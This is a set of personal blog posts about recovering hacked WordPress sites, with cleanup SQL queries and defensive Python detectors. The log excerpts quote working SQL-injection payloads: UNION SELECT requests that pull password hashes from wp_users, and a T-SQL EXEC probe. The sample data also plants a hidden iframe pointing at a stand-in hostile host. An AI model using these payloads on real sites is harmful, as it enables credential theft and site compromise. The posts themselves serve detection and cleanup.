Routed

I’ve been working all weekend to seal up the leaks in MT.Net. I feel I’m at a point where things are pretty much back to normal. Passwords have been changed, databases scanned, files examined, and all possible patches have been applied. I went far beyond simply fixing WordPress: updating the operating system was long overdue, so I did the whole nine yards.

Lessons learned? Whenever strange behavior presents itself, don’t stop hunting until you’re sure you’ve found it all. Sometimes this means ruling out every possible thing, as it’s very tough (and also very foolish) to say “I’m secure.” Only time can answer that.

If you run a WordPress site, fire up a MySQL session against its database and run this query (adjust the wp_ table prefix if your install uses a different one):

select * from wp_users where user_login='WordPress';

If you find a “WordPress” user, delete it. Nothing in a stock install creates an account by that name, so it doesn’t belong there.

delete from wp_users where user_login='WordPress';

Also, you should not have entries in your user table with invalid dates: WordPress stamps user_registered when it creates an account, so a zero date (0000-00-00 00:00:00) means the row was inserted behind its back. Look over what this query brings back before you delete it:

select * from wp_users where user_registered like '%0000%';
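The two checks above, plus the one a practitioner would add next (list every account that holds the administrator capability, since a planted admin need not be called “WordPress”), as an added example that is not the post’s own code. It is written against DB-API 2.0, so with MySQLdb or pymysql it runs against the real wp_users and wp_usermeta tables; here it runs on an in-memory sqlite3 stand-in loaded with constructed rows. The table prefix and the rogue-login list are parameters, the prefix is validated because identifiers cannot be bound, and every value is bound rather than spliced into the SQL.

```python
"""Audit a WordPress user table for the indicators described in the post.

Added example, not the post's own code. Runs against any DB-API 2.0
connection; the demo uses an in-memory sqlite3 stand-in with constructed rows.
"""
import re
import sqlite3

ROGUE_LOGINS = ("WordPress",)      # logins a stock install never creates
ZERO_DATE_PATTERN = "0000-00-00%"  # wp_insert_user always sets a real timestamp


def _placeholder(conn):
    """sqlite3 binds with '?', MySQLdb/pymysql with '%s'."""
    return "?" if isinstance(conn, sqlite3.Connection) else "%s"


def _checked_prefix(prefix):
    """Table names cannot be bound as parameters, so refuse anything but a plain identifier."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):
        raise ValueError(f"unsafe table prefix: {prefix!r}")
    return prefix


def find_suspicious_users(conn, prefix="wp_"):
    """Rows whose login is on the rogue list or whose registration date is the zero date.
    Returns a list of (ID, user_login, user_registered) tuples."""
    p, ph = _checked_prefix(prefix), _placeholder(conn)
    cur = conn.cursor()
    cur.execute(
        f"SELECT ID, user_login, user_registered FROM {p}users "
        f"WHERE user_login IN ({','.join([ph] * len(ROGUE_LOGINS))}) "
        f"OR user_registered LIKE {ph} ORDER BY ID",
        (*ROGUE_LOGINS, ZERO_DATE_PATTERN),
    )
    return cur.fetchall()


def list_administrators(conn, prefix="wp_"):
    """Every login holding the administrator capability. WordPress keeps roles in
    {prefix}usermeta under meta_key '{prefix}capabilities' as a serialized PHP array,
    so a LIKE on the value is enough to pick admins out. Compare the result against
    the accounts you know you created."""
    p, ph = _checked_prefix(prefix), _placeholder(conn)
    cur = conn.cursor()
    cur.execute(
        f"SELECT u.ID, u.user_login FROM {p}users u "
        f"JOIN {p}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = {ph} AND m.meta_value LIKE {ph} ORDER BY u.ID",
        (f"{p}capabilities", "%administrator%"),
    )
    return cur.fetchall()


def delete_users(conn, ids, prefix="wp_"):
    """Delete the given user IDs and their usermeta rows (the capabilities live there,
    so leaving them behind leaves orphaned admin grants). Returns users deleted."""
    ids = list(ids)
    if not ids:
        return 0
    p, ph = _checked_prefix(prefix), _placeholder(conn)
    marks = ",".join([ph] * len(ids))
    cur = conn.cursor()
    cur.execute(f"DELETE FROM {p}usermeta WHERE user_id IN ({marks})", ids)
    cur.execute(f"DELETE FROM {p}users WHERE ID IN ({marks})", ids)
    deleted = cur.rowcount
    conn.commit()
    return deleted


def demo_connection():
    """Constructed stand-in for a WordPress database: one real admin, one planted
    'WordPress' admin, one subscriber, and a planted admin under a plausible name."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES
            (1, 'markt',     '2005-03-01 12:00:00'),
            (2, 'WordPress', '0000-00-00 00:00:00'),
            (3, 'reader',    '2008-09-20 08:15:00'),
            (4, 'svcadmin',  '0000-00-00 00:00:00');
        INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES
            (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
            (2, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
            (3, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
            (4, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
    """)
    return conn


if __name__ == "__main__":
    db = demo_connection()
    flagged = find_suspicious_users(db)
    print("flagged:", flagged)
    print("admins before:", list_administrators(db))
    print("deleted:", delete_users(db, [row[0] for row in flagged]))
    print("admins after:", list_administrators(db))
```

In the constructed data the “svcadmin” row is the case the login check alone would miss: it has a normal-looking name but a zero registration date and an administrator grant, which is why the date check and the admin listing are worth running alongside the name check.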

I found this page to be useful for the final cleanup.

If you’ve got an MT.Net account (for posting comments, for instance), please take a moment to change its password.

Restored

It’s been a busy weekend here at MT.Net. I’ve been cleaning up the MT.Net webhost after some script kiddies went wild with an exploit. I have a hunch the kiddies attacked a vulnerability in the Bad Behavior plugin, as the only blogs on my site that got pwned were the only ones running the BB plugin. There was a time when the BB plugin started acting funky and needed an upgrade, and BB would be an obvious target for the bad guys. Fortunately I had copious backups. (I find it interesting that the BB website is offline at the moment.)

If y’all see anything out of place, give me a holla. It’s possible I missed something.

More webserver attacks

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to pull the password hashes (the user_pass column) out of the wp_users table with a UNION SELECT: first with a double-encoded quote (%2527) to break out of the string, then with a numeric cat value and padding nulls to line up the column count:

216.83.63.254 - - [03/Oct/2008:14:30:38 -0400] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:39 -0400] "POST /xmlrpc.php HTTP/1.1" 403 970 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:47 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 403 984 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:54 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 403 295 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 403 295 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
216.83.63.254 - - [03/Oct/2008:14:30:55 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(…%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 42469 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"

It turns out to be a SQL injection attack, allegedly being carried out by a criminal gang called Rock Phish (or by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. One caveat: DECLARE, CAST and EXEC on an @variable are Transact-SQL, so this payload is aimed at Microsoft SQL Server behind ASP pages; against a MySQL-backed WordPress it is noise, and the 200 in the log only means WordPress ignored the bogus query string. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
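Both log excerpts above (the k1b/“Security Kol” UNION SELECT against wp_users, and the DECLARE/CAST/EXEC probe) can be picked out of an Apache combined-format log with a small parser. The following is an added example, not code from the original posts: the three log lines it scans are constructed to resemble the ones logged above, and the hex inside CAST() is a made-up stand-in that decodes to WAITFOR DELAY '0:0:5'. Two details matter in practice: %2527 is a double-encoded single quote, so the query string has to be decoded until it stops changing, and the T-SQL family hides its real statement as a hex literal, so the detector decodes that too before matching signatures.

```python
"""Pick SQL-injection probes out of an Apache combined-format access log.

Added example, not code from the original posts. The sample lines are
constructed to resemble the ones logged above; the hex inside CAST() is a
made-up stand-in that decodes to WAITFOR DELAY '0:0:5'.
"""
import re
from typing import Optional
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Two families seen in the posts: MySQL UNION-based reads of wp_users, and the
# Transact-SQL DECLARE/CAST/EXEC probe that smuggles its real statement as hex.
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "wp_users_read": re.compile(r"\bfrom\s+wp_users\b", re.I),
    "tsql_exec":     re.compile(r"\bdeclare\s+@\w+.*\bexec\s*\(", re.I | re.S),
    "waitfor_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "mysql_comment": re.compile(r"/\*\s*$"),  # trailing /* that swallows the rest of the query
}
HEX_CAST_RE = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.I)


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until the text stops changing: %2527 -> %27 -> ' takes two rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def decode_hex_payload(sql: str) -> Optional[str]:
    """Text hidden in CAST(0x... AS CHAR/VARCHAR/NVARCHAR), or None if there is none."""
    m = HEX_CAST_RE.search(sql)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("ascii", errors="replace")
    except ValueError:
        return None


def analyze_line(line: str) -> Optional[dict]:
    """Parse one line; return a finding dict, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = fully_decode(m.group("target"))
    hidden = decode_hex_payload(target)
    haystack = target if hidden is None else target + "\n" + hidden
    hits = [name for name, rx in SIGNATURES.items() if rx.search(haystack)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "decoded_target": target,
        "hidden_sql": hidden,
        "signatures": hits,
    }


def analyze_log(lines):
    return [f for f in map(analyze_line, lines) if f is not None]


# Constructed sample: one benign request, one UNION probe, one T-SQL probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Oct/2008:14:00:00 -0400] "GET /index.php?cat=3 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '216.83.63.254 - - [03/Oct/2008:14:30:54 -0400] "GET /index.php?cat=%2527+UNION+SELECT+'
    'CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" '
    '403 295 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"',
    "163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] \"GET /?';DECLARE%20@S%20CHAR(4000);"
    "SET%20@S=CAST(0x57414954464F522044454C41592027303A303A3527%20AS%20CHAR(4000));EXEC(@S); "
    'HTTP/1.1" 200 42469 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"',
]

if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["signatures"])
        print("   ", finding["decoded_target"][:80])
        if finding["hidden_sql"]:
            print("    hidden:", finding["hidden_sql"])
```

Run it over a real access_log with `analyze_log(open(path))` and group the findings by IP; the status code is kept in each finding because a 200 on a UNION line is the one worth chasing, while the 403s above show the request was refused before WordPress saw it.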

Anniversary

It’s been nine wonderful years. Happy Anniversary, my love!

Blogging blocker

You may have noticed I don’t do much posting evenings and weekends. It’s not that I don’t want to or have nothing to say; it’s just that I’ve got an ailing laptop that’s been giving me trouble recently.

I’ve known for a while that my Thinkpad T40 doesn’t like to be run anywhere but from a desk. The moment it’s anything but completely horizontal it promptly zaps its memory, leaving me to reboot the system. Frustrated by its lack of portability, I took it apart last night to see if I could find any visible damage. After an easy disassembly and look-over, I cranked it back up only to have it be even less reliable than before. Now it won’t even boot consistently from a flat surface. That’ll teach me to play technician!

Phishing attempt is stoped

This just arrived in my inbox. Someone obviously didn’t read my earlier post:

From: “Google-AdWords-Noreply” support at google.com
To: markt at blahblahblah.blah
Subject: Your AdWords Google Account is stoped.

My account is stoped. My God, how could this have happened?

Packt lss

Looks like my blog server is currently having packet loss issues. Don’t expect much from MT.Net until these issues get resolved.

WordPress hacked

One of my umpteen million WordPress sites (but not this one) was “hacked” by an iframe injection. It was a WordPress 2.3 site which I had put off upgrading. Only one site and only one post had the hack: an iframe that somehow got tacked on to the end of the post. Google helpfully alerted me to the issue when it scanned my site and detected the hack. Pretty useful, that Google.

I’m still investigating how the attack occurred, as the single-post aspect makes me suspect a browser-based attack. I don’t really consider it a hack in the traditional sense, though I’m still puzzling over it. Any clues from my fellow network security gurus out there would be appreciated.

Y’all fellow WordPressers might want to check your WordPress database(s) for the issue. This SQL statement did it for me.

SELECT COUNT(*) FROM wp_posts WHERE post_content LIKE '%iframe%';

…run against your WordPress database, with the wp_ prefix adjusted if yours differs. (The column that holds the post body is post_content.) A non-zero count is not proof by itself, since legitimate video embeds use iframes too, so look at the matching rows before cleaning anything up.
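A scan that goes one step past the COUNT(*) above, as an added example rather than the post’s own code: it pulls every row of wp_posts, finds iframe tags in Python (so case tricks like <IFRAME> and hidden-frame attributes are caught), and reports the src, whether the frame is hidden, and whether it sits at the very end of the post, the placement described above. It runs here on an in-memory sqlite3 stand-in with three constructed posts and made-up example.invalid hostnames; against MySQL the same SELECT works unchanged over a MySQLdb or pymysql connection.

```python
"""Find iframe injections in wp_posts and report where each one sits.

Added example, not the post's own code. Runs on any DB-API 2.0 connection; the
demo uses an in-memory sqlite3 stand-in loaded with three constructed posts.
"""
import re
import sqlite3

IFRAME_RE = re.compile(r"<\s*iframe\b[^>]*>", re.I | re.S)
CLOSE_RE = re.compile(r"<\s*/\s*iframe\s*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Attribute tricks that make an injected frame invisible to the visitor.
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?0(?!\d)", re.I
)


def find_iframe_posts(conn, prefix="wp_"):
    """One finding per iframe tag: post ID and type, the src, whether the frame is
    hidden, and whether it is the last thing in the post (the 'tacked on to the end'
    placement). Revisions live in wp_posts too, so they get scanned as well."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):   # identifiers cannot be bound
        raise ValueError(f"unsafe table prefix: {prefix!r}")
    cur = conn.cursor()
    cur.execute(f"SELECT ID, post_type, post_content FROM {prefix}posts ORDER BY ID")
    findings = []
    for post_id, post_type, content in cur.fetchall():
        content = content or ""
        for m in IFRAME_RE.finditer(content):
            tag = m.group(0)
            src = SRC_RE.search(tag)
            # Whatever follows the tag, minus its own closing tag: empty means the
            # frame was appended at the end of the post.
            tail = CLOSE_RE.sub("", content[m.end():], count=1).strip()
            findings.append({
                "post_id": post_id,
                "post_type": post_type,
                "src": src.group(1) if src else None,
                "hidden": bool(HIDDEN_RE.search(tag)),
                "at_end": tail == "",
            })
    return findings


def demo_posts():
    """Constructed stand-in: a clean post, one with a hidden frame appended at the
    end, and one with an ordinary visible embed in the middle."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_type TEXT, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (1, "post", "<p>Normal post about the weekend.</p>"),
        (2, "post", '<p>Birthday pictures.</p>\n'
                    '<IFRAME src="http://evil.example.invalid/in.php" width=0 height=0 style="display:none"></IFRAME>'),
        (3, "post", "<p>Video:</p><iframe src='http://video.example.invalid/embed/42' "
                    "width='425' height='344'></iframe><p>Enjoy.</p>"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for f in find_iframe_posts(demo_posts()):
        flag = "SUSPECT" if f["hidden"] or f["at_end"] else "review"
        print(f"{flag}: post {f['post_id']} ({f['post_type']}) src={f['src']} "
              f"hidden={f['hidden']} at_end={f['at_end']}")
```

The hidden/at_end flags are what separate the planted frame from a legitimate embed in the constructed data; on a real site, any src pointing at a host you do not recognise deserves the same treatment regardless of the flags.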